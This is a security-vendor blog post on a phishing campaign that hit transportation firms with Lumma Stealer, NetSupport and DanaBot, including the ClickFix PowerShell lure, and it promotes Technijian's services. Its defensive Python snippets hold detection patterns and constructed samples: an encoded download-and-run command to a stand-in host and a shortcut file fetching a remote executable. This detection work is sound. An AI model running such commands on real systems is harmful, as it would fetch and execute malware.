Cyberattacks Strike North American Transportation Companies Using Lumma Stealer and NetSupport Malware

Transportation and logistics companies across North America have fallen victim to a new wave of cyberattacks delivering a range of malicious software. Recent reports from cybersecurity firm Proofpoint reveal that cybercriminals are running a phishing campaign against these industries, deploying a variety of information stealers and remote access trojans (RATs), including the notorious Lumma Stealer and NetSupport Manager malware.

These sophisticated attacks, which began in May 2024 and have continued into late August, highlight the increasing threat faced by critical infrastructure industries, including transportation, which are essential to the functioning of the global supply chain.

Phishing Campaign Exploiting Compromised Email Accounts

The attackers behind this campaign have utilized compromised legitimate email accounts belonging to transportation and shipping companies to inject malware into ongoing email threads. This tactic has proven to be particularly effective, as it lends legitimacy to the malicious emails, making it harder for recipients to detect the fraudulent nature of the communication. According to Proofpoint, as many as 15 email accounts have been breached and used as part of this ongoing attack.

Though the exact method by which these accounts were compromised remains unclear, it’s evident that the attackers are well-organized and sophisticated. The phishing emails typically contain .URL attachments or links to Google Drive, which lead to malicious files that activate once opened by unsuspecting users. The malware, once triggered, uses Server Message Block (SMB) to download additional payloads, further infiltrating the victim’s system.
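A check a mail gateway or analyst could apply to the .URL attachments described above, as an added example that is not from Proofpoint or the original article: it parses the Internet Shortcut file and flags targets on a remote share, the kind of target that makes Windows reach out over SMB. The function names and the sample files are constructed for illustration, and treating both `URL` and `IconFile` as fetch targets is an assumption of this sketch.

```python
import configparser
from urllib.parse import urlsplit


def remote_share_host(target):
    """Return the host if target is a UNC path or a file:// URL with a remote host."""
    t = target.strip().replace("\\", "/")
    if t.startswith("//"):                      # UNC form: \\host\share\file
        return t[2:].split("/", 1)[0] or None
    try:
        parts = urlsplit(t)
    except ValueError:                          # malformed URL: nothing to flag
        return None
    if parts.scheme.lower() == "file" and parts.hostname not in (None, "localhost"):
        return parts.hostname
    return None


def triage_url_attachment(text):
    """Parse a .url file and list (key, host) pairs that point at a remote share."""
    parser = configparser.RawConfigParser(strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:                  # not a valid shortcut file
        return {"parsed": False, "remote": []}
    remote = []
    for section in parser.sections():
        if section.lower() != "internetshortcut":
            continue
        for key in ("url", "iconfile"):         # option names are lower-cased by the parser
            value = parser.get(section, key, fallback=None)
            host = remote_share_host(value) if value else None
            if host:
                remote.append((key, host))
    return {"parsed": True, "remote": remote}


# Constructed sample attachments (documentation IP range, not campaign data)
BENIGN = "[InternetShortcut]\nURL=https://example.com/tracking\n"
SUSPECT = ("[InternetShortcut]\n"
           "URL=file://203.0.113.10/share/constructed.exe\n"
           "IconIndex=0\n")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, triage_url_attachment(body))
```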

Lumma Stealer, NetSupport Manager, and Evolving Tactics

Initially, from May to July 2024, the attackers predominantly relied on Lumma Stealer, StealC, and NetSupport Manager to carry out their attacks. Lumma Stealer is particularly dangerous as it is designed to exfiltrate sensitive information such as user credentials, banking details, and other personal data. NetSupport Manager, while initially a legitimate remote access tool, has been repurposed by the attackers as a trojan to take full control of the victim’s system remotely.

In August 2024, the cybercriminals updated their methods, using new infrastructure and delivery techniques. They also introduced new malware payloads, including DanaBot and Arechclient2, increasing the complexity and potential damage of their attacks. These new tactics make the threat even more dangerous, as they are designed to evade detection by conventional security systems.

One particularly concerning element of this new attack vector is the use of a method known as ClickFix. Victims are tricked into pasting a Base64-encoded PowerShell script into their terminal, initiating the download and installation of the DanaBot malware. This method exploits human error, preying on the victim’s trust in the malicious emails, which often impersonate well-known transportation management software providers such as Samsara, AMB Logistic, and Astra TMS.
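For detection, the pasted ClickFix command can be examined in process-creation logs that record command lines. The following is an added example, not code from Proofpoint or the original article: it decodes the Base64 argument of a PowerShell command line (Base64 over UTF-16LE text) and flags download-and-run markers. The marker list, function names and sample lines are constructed assumptions.

```python
import base64
import re

# -e, -ec, -enc ... -EncodedCommand followed by a Base64 blob
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Assumed heuristic list of download-and-run markers; tune for your environment
INDICATORS = ("invoke-webrequest", "iwr", "downloadstring",
              "invoke-expression", "iex", "start-bitstransfer")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        # PowerShell expects Base64 over UTF-16LE text
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad Base64 or bad UTF-16 (both subclass ValueError)
        return None


def triage(cmdline):
    """Classify one process-creation command line."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "hits": [], "script": None}
    lowered = script.lower()
    hits = [marker for marker in INDICATORS if marker in lowered]
    return {"encoded": True, "hits": hits, "script": script}


def _sample(script):
    """Build a constructed command line the way a pasted one would look."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -w hidden -enc " + blob


# Constructed sample log lines (not taken from the campaign)
SAMPLES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-Date",
    _sample("Get-ChildItem C:\\Temp"),
    _sample("iex (iwr 'http://example.invalid/constructed')"),
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = triage(line)
        print(result["encoded"], result["hits"], result["script"])
```

An encoded command with no marker hits is still worth reviewing when its parent process is a browser or mail client, since ordinary users rarely launch encoded PowerShell.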

Impact on the Transportation Industry

The transportation and logistics sectors have long been attractive targets for cybercriminals, given the critical role they play in the global economy. By disrupting operations or stealing sensitive data, cybercriminals can cause significant financial and operational damage to businesses. These industries rely on seamless coordination and communication, making any cyberattack particularly devastating.

The latest attack campaigns, focusing on companies involved in freight operations and fleet management, suggest that the attackers conduct extensive research on their targets, ensuring their phishing emails appear legitimate and relevant to the recipient. This targeting method increases the likelihood of success, as the victims are more likely to engage with the malicious content.

According to Proofpoint, the attackers behind this campaign may be financially motivated, seeking to steal valuable data that can be sold on dark web marketplaces. However, some researchers suggest that the evolving tactics and the introduction of espionage-related malware like RomCom RAT indicate that there may be broader motivations at play, such as espionage or sabotage.

Emerging Malware Threats: A Growing Concern

In addition to Lumma Stealer and NetSupport Manager, the transportation sector is facing a wave of emerging malware strains. These include Angry Stealer, BLX Stealer, and Gomorrah Stealer, among others. These new variants are designed to steal various types of sensitive data, ranging from login credentials to credit card information and cryptocurrency wallets.

Furthermore, the discovery of RomCom RAT—a sophisticated remote access trojan used in targeted espionage campaigns—adds another layer of complexity to the threat landscape. RomCom RAT allows attackers to execute commands, download additional malware, and even control the victim’s system entirely. Unlike earlier versions of the malware that were linked to ransomware campaigns, RomCom RAT appears to be focused on gathering intelligence, possibly indicating a shift toward cyber-espionage activities.

The threat posed by these new malware variants cannot be overstated, as they have the potential to disrupt critical infrastructure and steal invaluable data, leaving companies vulnerable to further attacks and financial losses.

How Technijian Can Help Protect Against These Threats

In light of these evolving threats, companies must take proactive steps to bolster their cybersecurity defenses. Technijian, a leading provider of managed IT and cybersecurity services, can help businesses protect themselves from the growing wave of cyberattacks.

Technijian offers a comprehensive suite of security solutions designed to address the unique challenges faced by the transportation and logistics sectors. These services include:

  • Advanced Email Security: By deploying cutting-edge email filtering and threat detection systems, Technijian can help businesses identify and block phishing attempts before they reach employees’ inboxes. These tools analyze incoming emails for malicious attachments, URLs, and suspicious behaviors, reducing the risk of successful phishing campaigns.
  • Endpoint Detection and Response (EDR): Technijian provides robust endpoint protection solutions that monitor and detect suspicious activities across all devices connected to a company’s network. By using EDR, businesses can quickly identify and respond to malware infections, minimizing damage and preventing the spread of malicious software.
  • Security Awareness Training: One of the most effective ways to prevent cyberattacks is through education. Technijian offers comprehensive security awareness training programs that teach employees how to recognize phishing attempts, avoid suspicious downloads, and safely navigate the digital landscape. This training empowers employees to become the first line of defense against cyber threats.
  • Incident Response Services: In the event of a security breach, Technijian provides expert incident response services. Their team of cybersecurity professionals can quickly assess the scope of the attack, mitigate the damage, and help businesses recover from the breach. This rapid response is critical in minimizing downtime and reducing financial losses.
  • Regular Security Audits and Vulnerability Assessments: To stay ahead of cybercriminals, businesses must regularly evaluate their security posture. Technijian’s security audits and vulnerability assessments help identify weak points in a company’s defenses, allowing for targeted improvements that fortify the organization against future threats.

By partnering with Technijian, transportation and logistics companies can significantly reduce their risk of falling victim to cyberattacks. Technijian’s expertise and comprehensive approach to cybersecurity ensure that businesses have the tools and knowledge needed to protect their operations and maintain the trust of their customers.

FAQs

1. What is Lumma Stealer?
Lumma Stealer is an information-stealing malware designed to collect sensitive data, such as login credentials, personal information, and financial details from infected systems.

2. How does NetSupport Manager malware work?
NetSupport Manager is a legitimate remote access tool that has been repurposed by cybercriminals as a remote access trojan (RAT). It allows attackers to control a victim’s computer remotely, giving them access to sensitive data and the ability to execute commands.

3. What is ClickFix, and how does it trick users?
ClickFix is a phishing technique where users are tricked into copying and pasting a Base64-encoded PowerShell script into their terminal, unknowingly initiating the malware download and infection process.

4. How do attackers use compromised email accounts in these campaigns?
Attackers compromise legitimate email accounts from transportation companies and use them to send malicious content. This tactic increases the likelihood that recipients will trust and engage with the malicious emails.

5. What steps can transportation companies take to protect themselves from these attacks?
Companies can protect themselves by implementing advanced email security measures, conducting regular security audits, providing employee training on phishing risks, and using endpoint detection and response systems.

6. How can Technijian help businesses protect against these types of cyberattacks?
Technijian offers a range of cybersecurity services, including email security, endpoint protection, incident response, and security awareness training. These services are designed to help businesses prevent, detect, and respond to cyber threats effectively.

Conclusion

The recent surge in cyberattacks targeting transportation companies is a stark reminder of the importance of robust cybersecurity measures. With the use of advanced malware like Lumma Stealer and NetSupport Manager, and the increasingly sophisticated phishing tactics employed by attackers, businesses must remain vigilant. By partnering with cybersecurity experts like Technijian, companies can ensure they are equipped to defend against these evolving threats and protect their critical operations.

About

Technijian is a premier provider of managed IT services in Orange County, delivering top-tier IT solutions designed to empower businesses to thrive in today’s fast-paced digital landscape. With a focus on reliability, security, and efficiency, we specialize in offering IT services that are tailored to meet the unique needs of businesses across Orange County and beyond.

Located in the heart of Irvine, Technijian has earned a reputation as a trusted partner for businesses seeking robust IT support in Irvine, Anaheim, Riverside, San Bernardino, and across Orange County. Our dedicated team of IT experts ensures that your technology infrastructure is always optimized, secure, and aligned with your business goals. Whether you require managed IT services in Irvine, IT consulting, or cloud services in Orange County, we’ve got you covered.

As a leader in IT support in Orange County, we understand the challenges businesses face when maintaining and advancing their IT environments. That’s why our comprehensive suite of services includes IT infrastructure management, IT support in Anaheim, IT help desk, and IT outsourcing services. With proactive monitoring, disaster recovery, and strategic consulting, our goal is to minimize downtime, enhance productivity, and provide IT security services that give you peace of mind.

At Technijian, we take pride in offering customized managed IT solutions that exceed client expectations. From small businesses to large enterprises, our IT services in Irvine are designed to scale with your needs and support your growth. We specialize in cloud services, IT systems management, business IT support, technology support services, IT network management, and enterprise IT support. Whether you’re looking for IT support in Riverside, IT solutions in San Diego, or managed IT services in Anaheim, Technijian has the expertise to meet your requirements.

Whether you need help with IT performance optimization, IT service management, or IT security solutions, we provide comprehensive services that enable businesses to remain agile in today’s competitive market. Our IT solutions provider services ensure your operations remain secure, productive, and future-ready.

Experience the difference with Technijian—your trusted partner for IT consulting services, managed IT services, and IT support in Orange County. Let us guide you through the complexities of modern IT infrastructure and help you achieve your business objectives with confidence.

Ravi Jain

Technijian was founded in November of 2000 by Ravi Jain with the goal of providing technology support for small to midsize companies. As the company grew in size, it also expanded its services to address the growing needs of its loyal client base. From its humble beginnings as a one-man-IT-shop, Technijian now employs teams of support staff and engineers in domestic and international offices. Technijian’s US-based office provides the primary line of communication for customers, ensuring each customer enjoys the personalized service for which Technijian has become known.
